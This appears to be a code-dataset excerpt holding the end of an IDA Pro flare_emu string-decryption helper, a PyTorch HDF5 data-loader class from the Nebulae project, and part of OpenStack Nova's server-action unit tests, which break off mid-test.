data_length = argv[3]
RC4_key = idaapi.get_bytes(ENCRYPTED_STRING_BUFFER + key_offset, key_length)
RC4_encrypted_buffer = idaapi.get_bytes(ENCRYPTED_STRING_BUFFER + key_offset + key_length, data_length)
decrypted_str = RC4_crypt(RC4_key, RC4_encrypted_buffer)
print(hex(address) + ' ' + decrypted_str)
eh.analysisHelper.setComment(address, decrypted_str, False)
eh = flare_emu.EmuHelper()
# Change "string_decrypt" to the string decryption function name on IDA Pro
eh.iterate(eh.analysisHelper.getNameAddr("string_decrypt"), decode_callback)
| 30.829787 | 107 | 0.68668 |
4a25a1282f91054de0829055d595b31806dc3575 | 3,473 | py | Python | nebulae/fuel/tank_pt.py | SeriaZheng/Nebulae | 27a0b78560e66f6ad6540ee7e04c29e03e632bbd | [
"MIT"
] | 2 | 2021-12-24T08:28:44.000Z | 2022-01-05T09:03:32.000Z | nebulae/fuel/tank_pt.py | SeriaZheng/Nebulae | 27a0b78560e66f6ad6540ee7e04c29e03e632bbd | [
"MIT"
] | null | null | null | nebulae/fuel/tank_pt.py | SeriaZheng/Nebulae | 27a0b78560e66f6ad6540ee7e04c29e03e632bbd | [
"MIT"
] | null | null | null | #!/usr/bin/env python
'''
Created by Seria at 02/11/2018 3:38 PM
Email: [email protected]
_ooOoo_
o888888888o
o88`_ . _`88o
(| 0 0 |)
O \ 。 / O
_____/`-----‘\_____
.’ \|| _ _ ||/ `.
| _ ||| | ||| _ |
| | \\ // | |
| | \-----/ | |
\ .\ ___/- -\___ /. /
,--- / ___\<|>/___ \ ---,
| |: \ \ / / :| |
`\--\_ -. ___ .- _/--/‘
=========== \__ NOBUG __/ ===========
'''
# -*- coding:utf-8 -*-
import os
import h5py
from multiprocessing import cpu_count
from math import ceil
from torch.utils.data import Dataset, DataLoader
class Tank(object):
def __init__(self, data_path, data_specf, batch_size, shuffle=True, in_same_size=True,
fetch_fn=None, prep_fn=None, collate_fn=None):
name = os.path.basename(data_path).split('.')[0]
rank = int(os.environ.get('RANK', -1))
nworld = int(os.environ.get('WORLD_SIZE', 1))
class TData(Dataset):
def __init__(self, verbose=True):
with h5py.File(data_path, 'r') as f:
# make sure that the first dimension is batch
self.length = len(f[list(data_specf.keys())[0]])
if verbose:
print('+' + (49 * '-') + '+')
print('| \033[1;35m%-20s\033[0m fuel tank has been mounted |'% name)
print('+' + (49 * '-') + '+')
def _openH5(self):
self.hdf5 = h5py.File(data_path, 'r')
def __getitem__(self, idx: int):
if not hasattr(self, 'hdf5'):
self._openH5()
item = fetch_fn(self.hdf5, idx)
if prep_fn is not None:
item = prep_fn(item)
return item
def __len__(self):
return self.length
self.name = name
self.rank = rank
self.tdata = TData(rank<=0)
self.counter = 0
self.batch_size = batch_size
if in_same_size:
self.MPE = len(self.tdata) // (batch_size * nworld)
else:
self.MPE = ceil(len(self.tdata) / (batch_size * nworld))
ncpus = cpu_count()
if rank >= 0:
from torch.utils.data import distributed as dist
self.sampler = dist.DistributedSampler(self.tdata)
self.tloader = DataLoader(self.tdata, batch_size, sampler=self.sampler,
collate_fn=collate_fn, drop_last=in_same_size, num_workers=ncpus)
else:
self.tloader = DataLoader(self.tdata, batch_size, shuffle,
collate_fn=collate_fn, drop_last=in_same_size, num_workers=ncpus)
def __del__(self):
if self.rank<=0:
print('+' + (53 * '-') + '+')
print('| \033[1;35m%-20s\033[0m fuel tank is no longer mounted |' % self.name)
print('+' + (53 * '-') + '+')
def __len__(self):
return len(self.tdata)
def next(self):
if self.counter == 0: # create a new iterator at the begining of an epoch
self.iterator = self.tloader.__iter__()
self.counter += 1
if self.counter == self.MPE:
self.counter = 0
return self.iterator.__next__() | 36.177083 | 103 | 0.476533 |
4a25a3cd669ee1b7b4435440c4059bed6fc8327b | 51,386 | py | Python | nova/tests/unit/api/openstack/compute/test_server_actions.py | Nexenta/nova | ccecb507ff4bdcdd23d90e7b5b02a22c5a46ecc3 | [
"Apache-2.0"
] | 1 | 2020-08-14T02:20:59.000Z | 2020-08-14T02:20:59.000Z | nova/tests/unit/api/openstack/compute/test_server_actions.py | Nexenta/nova | ccecb507ff4bdcdd23d90e7b5b02a22c5a46ecc3 | [
"Apache-2.0"
] | 2 | 2021-03-31T20:04:16.000Z | 2021-12-13T20:45:03.000Z | nova/tests/unit/api/openstack/compute/test_server_actions.py | Nexenta/nova | ccecb507ff4bdcdd23d90e7b5b02a22c5a46ecc3 | [
"Apache-2.0"
] | 1 | 2020-07-24T02:31:45.000Z | 2020-07-24T02:31:45.000Z | # Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import fixtures
import mock
from oslo_utils.fixture import uuidsentinel as uuids
from oslo_utils import uuidutils
import webob
from nova.api.openstack.compute import servers as servers_v21
from nova.compute import api as compute_api
from nova.compute import task_states
from nova.compute import vm_states
import nova.conf
from nova import exception
from nova.image import glance
from nova import objects
from nova import test
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_block_device
from nova.tests.unit import fake_instance
from nova.tests.unit.image import fake
CONF = nova.conf.CONF
FAKE_UUID = fakes.FAKE_UUID
class MockSetAdminPassword(object):
def __init__(self):
self.instance_id = None
self.password = None
def __call__(self, context, instance, password):
self.instance_id = instance['uuid']
self.password = password
class ServerActionsControllerTestV21(test.TestCase):
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
image_base_url = 'http://localhost:9292/images/'
image_href = image_base_url + '/' + image_uuid
servers = servers_v21
validation_error = exception.ValidationError
request_too_large_error = exception.ValidationError
image_url = None
def setUp(self):
super(ServerActionsControllerTestV21, self).setUp()
self.flags(group='glance', api_servers=['http://localhost:9292'])
self.stub_out('nova.compute.api.API.get',
fakes.fake_compute_get(vm_state=vm_states.ACTIVE,
project_id=fakes.FAKE_PROJECT_ID,
host='fake_host'))
self.stub_out('nova.objects.Instance.save', lambda *a, **kw: None)
fakes.stub_out_compute_api_snapshot(self)
fake.stub_out_image_service(self)
self.flags(enable_instance_password=True, group='api')
self._image_href = '155d900f-4e14-4e4c-a73d-069cbf4541e6'
self.controller = self._get_controller()
self.compute_api = self.controller.compute_api
# We don't care about anything getting as far as hitting the compute
# RPC API so we just mock it out here.
mock_rpcapi = mock.patch.object(self.compute_api, 'compute_rpcapi')
mock_rpcapi.start()
self.addCleanup(mock_rpcapi.stop)
# The project_id here matches what is used by default in
# fake_compute_get which need to match for policy checks.
self.req = fakes.HTTPRequest.blank('',
project_id=fakes.FAKE_PROJECT_ID)
self.context = self.req.environ['nova.context']
self.image_api = glance.API()
# Assume that anything that hits the compute API and looks for a
# RequestSpec doesn't care about it, since testing logic that deep
# should be done in nova.tests.unit.compute.test_compute_api.
mock_reqspec = mock.patch('nova.objects.RequestSpec')
mock_reqspec.start()
self.addCleanup(mock_reqspec.stop)
# Similarly we shouldn't care about anything hitting conductor from
# these tests.
mock_conductor = mock.patch.object(
self.controller.compute_api, 'compute_task_api')
mock_conductor.start()
self.addCleanup(mock_conductor.stop)
# Assume that none of the tests are using ports with resource requests.
self.mock_list_port = self.useFixture(
fixtures.MockPatch('nova.network.neutron.API.list_ports')).mock
self.mock_list_port.return_value = {'ports': []}
def _get_controller(self):
return self.servers.ServersController()
def _test_locked_instance(self, action, method=None, body_map=None,
compute_api_args_map=None):
if body_map is None:
body_map = {}
if compute_api_args_map is None:
compute_api_args_map = {}
args, kwargs = compute_api_args_map.get(action, ((), {}))
uuid = uuidutils.generate_uuid()
context = self.req.environ['nova.context']
instance = fake_instance.fake_db_instance(
id=1, uuid=uuid, vm_state=vm_states.ACTIVE, task_state=None,
project_id=context.project_id,
user_id=context.user_id)
instance = objects.Instance._from_db_object(
self.context, objects.Instance(), instance)
with test.nested(
mock.patch.object(compute_api.API, 'get',
return_value=instance),
mock.patch.object(compute_api.API, method,
side_effect=exception.InstanceIsLocked(
instance_uuid=instance['uuid'])),
) as (mock_get, mock_method):
controller_function = 'self.controller.' + action
self.assertRaises(webob.exc.HTTPConflict,
eval(controller_function),
self.req, instance['uuid'],
body=body_map.get(action))
expected_attrs = ['flavor', 'numa_topology']
if method == 'resize':
expected_attrs.append('services')
mock_get.assert_called_once_with(self.context, uuid,
expected_attrs=expected_attrs,
cell_down_support=False)
mock_method.assert_called_once_with(self.context, instance,
*args, **kwargs)
def test_actions_with_locked_instance(self):
actions = ['_action_resize', '_action_confirm_resize',
'_action_revert_resize', '_action_reboot',
'_action_rebuild']
method_translations = {'_action_resize': 'resize',
'_action_confirm_resize': 'confirm_resize',
'_action_revert_resize': 'revert_resize',
'_action_reboot': 'reboot',
'_action_rebuild': 'rebuild'}
body_map = {'_action_resize': {'resize': {'flavorRef': '2'}},
'_action_reboot': {'reboot': {'type': 'HARD'}},
'_action_rebuild': {'rebuild': {
'imageRef': self.image_uuid,
'adminPass': 'TNc53Dr8s7vw'}}}
args_map = {'_action_resize': (('2'), {'auto_disk_config': None}),
'_action_confirm_resize': ((), {}),
'_action_reboot': (('HARD',), {}),
'_action_rebuild': ((self.image_uuid,
'TNc53Dr8s7vw'), {})}
for action in actions:
method = method_translations.get(action)
self._test_locked_instance(action, method=method,
body_map=body_map,
compute_api_args_map=args_map)
def test_reboot_hard(self):
body = dict(reboot=dict(type="HARD"))
self.controller._action_reboot(self.req, FAKE_UUID, body=body)
def test_reboot_soft(self):
body = dict(reboot=dict(type="SOFT"))
self.controller._action_reboot(self.req, FAKE_UUID, body=body)
def test_reboot_incorrect_type(self):
body = dict(reboot=dict(type="NOT_A_TYPE"))
self.assertRaises(self.validation_error,
self.controller._action_reboot,
self.req, FAKE_UUID, body=body)
def test_reboot_missing_type(self):
body = dict(reboot=dict())
self.assertRaises(self.validation_error,
self.controller._action_reboot,
self.req, FAKE_UUID, body=body)
def test_reboot_none(self):
body = dict(reboot=dict(type=None))
self.assertRaises(self.validation_error,
self.controller._action_reboot,
self.req, FAKE_UUID, body=body)
def test_reboot_not_found(self):
body = dict(reboot=dict(type="HARD"))
with mock.patch('nova.compute.api.API.get',
side_effect=exception.InstanceNotFound(
instance_id=uuids.fake)):
self.assertRaises(webob.exc.HTTPNotFound,
self.controller._action_reboot,
self.req, uuids.fake, body=body)
def test_reboot_raises_conflict_on_invalid_state(self):
body = dict(reboot=dict(type="HARD"))
def fake_reboot(*args, **kwargs):
raise exception.InstanceInvalidState(attr='fake_attr',
state='fake_state', method='fake_method',
instance_uuid='fake')
self.stub_out('nova.compute.api.API.reboot', fake_reboot)
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_reboot,
self.req, FAKE_UUID, body=body)
def test_reboot_soft_with_soft_in_progress_raises_conflict(self):
body = dict(reboot=dict(type="SOFT"))
self.stub_out('nova.compute.api.API.get',
fakes.fake_compute_get(project_id=fakes.FAKE_PROJECT_ID,
vm_state=vm_states.ACTIVE,
task_state=task_states.REBOOTING))
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_reboot,
self.req, FAKE_UUID, body=body)
def test_reboot_hard_with_soft_in_progress_does_not_raise(self):
body = dict(reboot=dict(type="HARD"))
self.stub_out('nova.compute.api.API.get',
fakes.fake_compute_get(project_id=fakes.FAKE_PROJECT_ID,
vm_state=vm_states.ACTIVE,
task_state=task_states.REBOOTING))
self.controller._action_reboot(self.req, FAKE_UUID, body=body)
def test_reboot_hard_with_hard_in_progress(self):
body = dict(reboot=dict(type="HARD"))
self.stub_out('nova.compute.api.API.get',
fakes.fake_compute_get(
project_id=fakes.FAKE_PROJECT_ID,
vm_state=vm_states.ACTIVE,
task_state=task_states.REBOOTING_HARD))
self.controller._action_reboot(self.req, FAKE_UUID, body=body)
def test_reboot_soft_with_hard_in_progress_raises_conflict(self):
body = dict(reboot=dict(type="SOFT"))
self.stub_out('nova.compute.api.API.get',
fakes.fake_compute_get(
project_id=fakes.FAKE_PROJECT_ID,
vm_state=vm_states.ACTIVE,
task_state=task_states.REBOOTING_HARD))
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_reboot,
self.req, FAKE_UUID, body=body)
def _test_rebuild_preserve_ephemeral(self, value=None):
return_server = fakes.fake_compute_get(
project_id=fakes.FAKE_PROJECT_ID,
image_ref='2',
vm_state=vm_states.ACTIVE,
host='fake_host')
self.stub_out('nova.compute.api.API.get', return_server)
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
if value is not None:
body['rebuild']['preserve_ephemeral'] = value
with mock.patch.object(compute_api.API, 'rebuild') as mock_rebuild:
self.controller._action_rebuild(self.req, FAKE_UUID, body=body)
if value is not None:
mock_rebuild.assert_called_once_with(self.context, mock.ANY,
self._image_href, mock.ANY, preserve_ephemeral=value)
else:
mock_rebuild.assert_called_once_with(self.context, mock.ANY,
self._image_href, mock.ANY)
def test_rebuild_preserve_ephemeral_true(self):
self._test_rebuild_preserve_ephemeral(True)
def test_rebuild_preserve_ephemeral_false(self):
self._test_rebuild_preserve_ephemeral(False)
def test_rebuild_preserve_ephemeral_default(self):
self._test_rebuild_preserve_ephemeral()
def test_rebuild_accepted_minimum(self):
return_server = fakes.fake_compute_get(
project_id=fakes.FAKE_PROJECT_ID,
image_ref='2',
vm_state=vm_states.ACTIVE, host='fake_host')
self.stub_out('nova.compute.api.API.get', return_server)
self_href = 'http://localhost/v2/servers/%s' % FAKE_UUID
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
robj = self.controller._action_rebuild(self.req, FAKE_UUID, body=body)
body = robj.obj
self.assertEqual(body['server']['image']['id'], '2')
self.assertEqual(len(body['server']['adminPass']),
CONF.password_length)
self.assertEqual(robj['location'], self_href)
# pep3333 requires applications produces headers which are str
self.assertEqual(str, type(robj['location']))
def test_rebuild_instance_with_image_uuid(self):
info = dict(image_href_in_call=None)
def rebuild(self2, context, instance, image_href, *args, **kwargs):
info['image_href_in_call'] = image_href
self.stub_out('nova.compute.api.API.rebuild', rebuild)
# proper local hrefs must start with 'http://localhost/v2/'
body = {
'rebuild': {
'imageRef': self.image_uuid,
},
}
self.controller._action_rebuild(self.req, FAKE_UUID, body=body)
self.assertEqual(info['image_href_in_call'], self.image_uuid)
def test_rebuild_instance_with_image_href_uses_uuid(self):
# proper local hrefs must start with 'http://localhost/v2/'
body = {
'rebuild': {
'imageRef': self.image_href,
},
}
self.assertRaises(exception.ValidationError,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=body)
def test_rebuild_accepted_minimum_pass_disabled(self):
# run with enable_instance_password disabled to verify adminPass
# is missing from response. See lp bug 921814
self.flags(enable_instance_password=False, group='api')
return_server = fakes.fake_compute_get(
project_id=fakes.FAKE_PROJECT_ID,
image_ref='2',
vm_state=vm_states.ACTIVE, host='fake_host')
self.stub_out('nova.compute.api.API.get', return_server)
self_href = 'http://localhost/v2/servers/%s' % FAKE_UUID
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
robj = self.controller._action_rebuild(self.req, FAKE_UUID, body=body)
body = robj.obj
self.assertEqual(body['server']['image']['id'], '2')
self.assertNotIn("adminPass", body['server'])
self.assertEqual(robj['location'], self_href)
# pep3333 requires applications produces headers which are str
self.assertEqual(str, type(robj['location']))
def test_rebuild_raises_conflict_on_invalid_state(self):
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
def fake_rebuild(*args, **kwargs):
raise exception.InstanceInvalidState(attr='fake_attr',
state='fake_state', method='fake_method',
instance_uuid='fake')
self.stub_out('nova.compute.api.API.rebuild', fake_rebuild)
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=body)
def test_rebuild_accepted_with_metadata(self):
metadata = {'new': 'metadata'}
return_server = fakes.fake_compute_get(
project_id=fakes.FAKE_PROJECT_ID,
metadata=metadata,
vm_state=vm_states.ACTIVE, host='fake_host')
self.stub_out('nova.compute.api.API.get', return_server)
body = {
"rebuild": {
"imageRef": self._image_href,
"metadata": metadata,
},
}
body = self.controller._action_rebuild(self.req, FAKE_UUID,
body=body).obj
self.assertEqual(body['server']['metadata'], metadata)
def test_rebuild_accepted_with_bad_metadata(self):
body = {
"rebuild": {
"imageRef": self._image_href,
"metadata": "stack",
},
}
self.assertRaises(self.validation_error,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=body)
def test_rebuild_with_too_large_metadata(self):
body = {
"rebuild": {
"imageRef": self._image_href,
"metadata": {
256 * "k": "value"
}
}
}
self.assertRaises(self.request_too_large_error,
self.controller._action_rebuild, self.req,
FAKE_UUID, body=body)
def test_rebuild_bad_entity(self):
body = {
"rebuild": {
"imageId": self._image_href,
},
}
self.assertRaises(self.validation_error,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=body)
def test_rebuild_admin_pass(self):
return_server = fakes.fake_compute_get(
project_id=fakes.FAKE_PROJECT_ID,
image_ref='2',
vm_state=vm_states.ACTIVE, host='fake_host')
self.stub_out('nova.compute.api.API.get', return_server)
body = {
"rebuild": {
"imageRef": self._image_href,
"adminPass": "asdf",
},
}
body = self.controller._action_rebuild(self.req, FAKE_UUID,
body=body).obj
self.assertEqual(body['server']['image']['id'], '2')
self.assertEqual(body['server']['adminPass'], 'asdf')
def test_rebuild_admin_pass_pass_disabled(self):
# run with enable_instance_password disabled to verify adminPass
# is missing from response. See lp bug 921814
self.flags(enable_instance_password=False, group='api')
return_server = fakes.fake_compute_get(
project_id=fakes.FAKE_PROJECT_ID,
image_ref='2',
vm_state=vm_states.ACTIVE, host='fake_host')
self.stub_out('nova.compute.api.API.get', return_server)
body = {
"rebuild": {
"imageRef": self._image_href,
"adminPass": "asdf",
},
}
body = self.controller._action_rebuild(self.req, FAKE_UUID,
body=body).obj
self.assertEqual(body['server']['image']['id'], '2')
self.assertNotIn('adminPass', body['server'])
def test_rebuild_server_not_found(self):
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
with mock.patch('nova.compute.api.API.get',
side_effect=exception.InstanceNotFound(
instance_id=FAKE_UUID)):
self.assertRaises(webob.exc.HTTPNotFound,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=body)
def test_rebuild_with_bad_image(self):
body = {
"rebuild": {
"imageRef": "foo",
},
}
self.assertRaises(exception.ValidationError,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=body)
def test_rebuild_accessIP(self):
attributes = {
'access_ip_v4': '172.19.0.1',
'access_ip_v6': 'fe80::1',
}
body = {
"rebuild": {
"imageRef": self._image_href,
"accessIPv4": "172.19.0.1",
"accessIPv6": "fe80::1",
},
}
data = {'changes': {}}
orig_get = compute_api.API.get
def wrap_get(*args, **kwargs):
data['instance'] = orig_get(*args, **kwargs)
return data['instance']
def fake_save(context, **kwargs):
data['changes'].update(data['instance'].obj_get_changes())
self.stub_out('nova.compute.api.API.get', wrap_get)
self.stub_out('nova.objects.Instance.save', fake_save)
self.controller._action_rebuild(self.req, FAKE_UUID, body=body)
self.assertEqual(self._image_href, data['changes']['image_ref'])
self.assertEqual("", data['changes']['kernel_id'])
self.assertEqual("", data['changes']['ramdisk_id'])
self.assertEqual(task_states.REBUILDING, data['changes']['task_state'])
self.assertEqual(0, data['changes']['progress'])
for attr, value in attributes.items():
self.assertEqual(value, str(data['changes'][attr]))
def test_rebuild_when_kernel_not_exists(self):
def return_image_meta(*args, **kwargs):
image_meta_table = {
'2': {'id': uuids.image_id, 'status': 'active',
'container_format': 'ari'},
'155d900f-4e14-4e4c-a73d-069cbf4541e6':
{'id': uuids.image_id, 'status': 'active',
'container_format': 'raw',
'properties': {'kernel_id': 1, 'ramdisk_id': 2}},
}
image_id = args[2]
try:
image_meta = image_meta_table[str(image_id)]
except KeyError:
raise exception.ImageNotFound(image_id=image_id)
return image_meta
self.stub_out('nova.tests.unit.image.fake._FakeImageService.show',
return_image_meta)
body = {
"rebuild": {
"imageRef": "155d900f-4e14-4e4c-a73d-069cbf4541e6",
},
}
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=body)
def test_rebuild_proper_kernel_ram(self):
instance_meta = {'kernel_id': None, 'ramdisk_id': None}
orig_get = compute_api.API.get
def wrap_get(*args, **kwargs):
inst = orig_get(*args, **kwargs)
instance_meta['instance'] = inst
return inst
def fake_save(context, **kwargs):
instance = instance_meta['instance']
for key in instance_meta.keys():
if key in instance.obj_what_changed():
instance_meta[key] = instance[key]
def return_image_meta(*args, **kwargs):
image_meta_table = {
uuids.kernel_image_id: {
'id': uuids.kernel_image_id,
'status': 'active',
'container_format': 'aki'},
uuids.ramdisk_image_id: {
'id': uuids.ramdisk_image_id,
'status': 'active',
'container_format': 'ari'},
'155d900f-4e14-4e4c-a73d-069cbf4541e6':
{'id': '155d900f-4e14-4e4c-a73d-069cbf4541e6',
'status': 'active',
'container_format': 'raw',
'properties': {'kernel_id': uuids.kernel_image_id,
'ramdisk_id': uuids.ramdisk_image_id}},
}
image_id = args[2]
try:
image_meta = image_meta_table[str(image_id)]
except KeyError:
raise exception.ImageNotFound(image_id=image_id)
return image_meta
self.stub_out('nova.tests.unit.image.fake._FakeImageService.show',
return_image_meta)
self.stub_out('nova.compute.api.API.get', wrap_get)
self.stub_out('nova.objects.Instance.save', fake_save)
body = {
"rebuild": {
"imageRef": "155d900f-4e14-4e4c-a73d-069cbf4541e6",
},
}
self.controller._action_rebuild(self.req, FAKE_UUID, body=body).obj
self.assertEqual(instance_meta['kernel_id'], uuids.kernel_image_id)
self.assertEqual(instance_meta['ramdisk_id'], uuids.ramdisk_image_id)
@mock.patch.object(compute_api.API, 'rebuild')
def test_rebuild_instance_raise_auto_disk_config_exc(self, mock_rebuild):
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
mock_rebuild.side_effect = exception.AutoDiskConfigDisabledByImage(
image='dummy')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=body)
@mock.patch.object(compute_api.API, 'rebuild')
def test_rebuild_raise_invalid_architecture_exc(self, mock_rebuild):
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
mock_rebuild.side_effect = exception.InvalidArchitectureName('arm64')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=body)
def test_resize_server(self):
body = dict(resize=dict(flavorRef="http://localhost/3"))
self.resize_called = False
def resize_mock(*args, **kwargs):
self.resize_called = True
self.stub_out('nova.compute.api.API.resize', resize_mock)
self.controller._action_resize(self.req, FAKE_UUID, body=body)
self.assertTrue(self.resize_called)
def test_resize_server_no_flavor(self):
body = dict(resize=dict())
self.assertRaises(self.validation_error,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
def test_resize_server_no_flavor_ref(self):
body = dict(resize=dict(flavorRef=None))
self.assertRaises(self.validation_error,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
def test_resize_server_with_extra_arg(self):
body = dict(resize=dict(favorRef="http://localhost/3",
extra_arg="extra_arg"))
self.assertRaises(self.validation_error,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
def test_resize_server_invalid_flavor_ref(self):
body = dict(resize=dict(flavorRef=1.2))
self.assertRaises(self.validation_error,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
def test_resize_with_server_not_found(self):
body = dict(resize=dict(flavorRef="http://localhost/3"))
with mock.patch('nova.compute.api.API.get',
side_effect=exception.InstanceNotFound(
instance_id=FAKE_UUID)):
self.assertRaises(webob.exc.HTTPNotFound,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
def test_resize_with_image_exceptions(self):
body = dict(resize=dict(flavorRef="http://localhost/3"))
self.resize_called = 0
image_id = 'fake_image_id'
exceptions = [
(exception.ImageNotAuthorized(image_id=image_id),
webob.exc.HTTPUnauthorized),
(exception.ImageNotFound(image_id=image_id),
webob.exc.HTTPBadRequest),
(exception.Invalid, webob.exc.HTTPBadRequest),
(exception.AutoDiskConfigDisabledByImage(image=image_id),
webob.exc.HTTPBadRequest),
]
raised, expected = map(iter, zip(*exceptions))
def _fake_resize(obj, context, instance, flavor_id,
auto_disk_config=None):
self.resize_called += 1
raise next(raised)
self.stub_out('nova.compute.api.API.resize', _fake_resize)
for call_no in range(len(exceptions)):
next_exception = next(expected)
actual = self.assertRaises(next_exception,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
if (isinstance(exceptions[call_no][0],
exception.NoValidHost)):
self.assertEqual(actual.explanation,
'No valid host was found. Bad host')
elif (isinstance(exceptions[call_no][0],
exception.AutoDiskConfigDisabledByImage)):
self.assertEqual(actual.explanation,
'Requested image fake_image_id has automatic'
' disk resize disabled.')
self.assertEqual(self.resize_called, call_no + 1)
@mock.patch('nova.compute.api.API.resize',
side_effect=exception.CannotResizeDisk(reason=''))
def test_resize_raises_cannot_resize_disk(self, mock_resize):
body = dict(resize=dict(flavorRef="http://localhost/3"))
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
@mock.patch('nova.compute.api.API.resize',
side_effect=exception.FlavorNotFound(reason='',
flavor_id='fake_id'))
def test_resize_raises_flavor_not_found(self, mock_resize):
body = dict(resize=dict(flavorRef="http://localhost/3"))
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
def test_resize_with_too_many_instances(self):
body = dict(resize=dict(flavorRef="http://localhost/3"))
def fake_resize(*args, **kwargs):
raise exception.TooManyInstances(message="TooManyInstance")
self.stub_out('nova.compute.api.API.resize', fake_resize)
self.assertRaises(webob.exc.HTTPForbidden,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
def test_resize_raises_conflict_on_invalid_state(self):
body = dict(resize=dict(flavorRef="http://localhost/3"))
def fake_resize(*args, **kwargs):
raise exception.InstanceInvalidState(attr='fake_attr',
state='fake_state', method='fake_method',
instance_uuid='fake')
self.stub_out('nova.compute.api.API.resize', fake_resize)
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
@mock.patch.object(compute_api.API, 'resize')
def test_resize_instance_raise_auto_disk_config_exc(self, mock_resize):
mock_resize.side_effect = exception.AutoDiskConfigDisabledByImage(
image='dummy')
body = dict(resize=dict(flavorRef="http://localhost/3"))
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
@mock.patch('nova.compute.api.API.resize',
side_effect=exception.PciRequestAliasNotDefined(
alias='fake_name'))
def test_resize_pci_alias_not_defined(self, mock_resize):
# Tests that PciRequestAliasNotDefined is translated to a 400 error.
body = dict(resize=dict(flavorRef="http://localhost/3"))
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
def test_confirm_resize_server(self):
body = dict(confirmResize=None)
self.confirm_resize_called = False
def cr_mock(*args):
self.confirm_resize_called = True
self.stub_out('nova.compute.api.API.confirm_resize', cr_mock)
self.controller._action_confirm_resize(self.req, FAKE_UUID, body=body)
self.assertTrue(self.confirm_resize_called)
def test_confirm_resize_migration_not_found(self):
body = dict(confirmResize=None)
def confirm_resize_mock(*args):
raise exception.MigrationNotFoundByStatus(instance_id=1,
status='finished')
self.stub_out('nova.compute.api.API.confirm_resize',
confirm_resize_mock)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_confirm_resize,
self.req, FAKE_UUID, body=body)
def test_confirm_resize_raises_conflict_on_invalid_state(self):
body = dict(confirmResize=None)
def fake_confirm_resize(*args, **kwargs):
raise exception.InstanceInvalidState(attr='fake_attr',
state='fake_state', method='fake_method',
instance_uuid='fake')
self.stub_out('nova.compute.api.API.confirm_resize',
fake_confirm_resize)
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_confirm_resize,
self.req, FAKE_UUID, body=body)
def test_revert_resize_migration_not_found(self):
body = dict(revertResize=None)
def revert_resize_mock(*args):
raise exception.MigrationNotFoundByStatus(instance_id=1,
status='finished')
self.stub_out('nova.compute.api.API.revert_resize',
revert_resize_mock)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_revert_resize,
self.req, FAKE_UUID, body=body)
def test_revert_resize_server_not_found(self):
body = dict(revertResize=None)
with mock.patch('nova.compute.api.API.get',
side_effect=exception.InstanceNotFound(
instance_id='bad_server_id')):
self.assertRaises(webob. exc.HTTPNotFound,
self.controller._action_revert_resize,
self.req, "bad_server_id", body=body)
def test_revert_resize_server(self):
body = dict(revertResize=None)
self.revert_resize_called = False
def revert_mock(*args):
self.revert_resize_called = True
self.stub_out('nova.compute.api.API.revert_resize', revert_mock)
body = self.controller._action_revert_resize(self.req, FAKE_UUID,
body=body)
self.assertTrue(self.revert_resize_called)
def test_revert_resize_raises_conflict_on_invalid_state(self):
body = dict(revertResize=None)
def fake_revert_resize(*args, **kwargs):
raise exception.InstanceInvalidState(attr='fake_attr',
state='fake_state', method='fake_method',
instance_uuid='fake')
self.stub_out('nova.compute.api.API.revert_resize',
fake_revert_resize)
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_revert_resize,
self.req, FAKE_UUID, body=body)
def test_create_image(self):
body = {
'createImage': {
'name': 'Snapshot 1',
},
}
response = self.controller._action_create_image(self.req, FAKE_UUID,
body=body)
location = response.headers['Location']
self.assertEqual(self.image_url + '123' if self.image_url else
self.image_api.generate_image_url('123', self.context),
location)
def test_create_image_v2_45(self):
"""Tests the createImage server action API with the 2.45 microversion
where there is a response body but no Location header.
"""
body = {
'createImage': {
'name': 'Snapshot 1',
},
}
req = fakes.HTTPRequest.blank('', version='2.45')
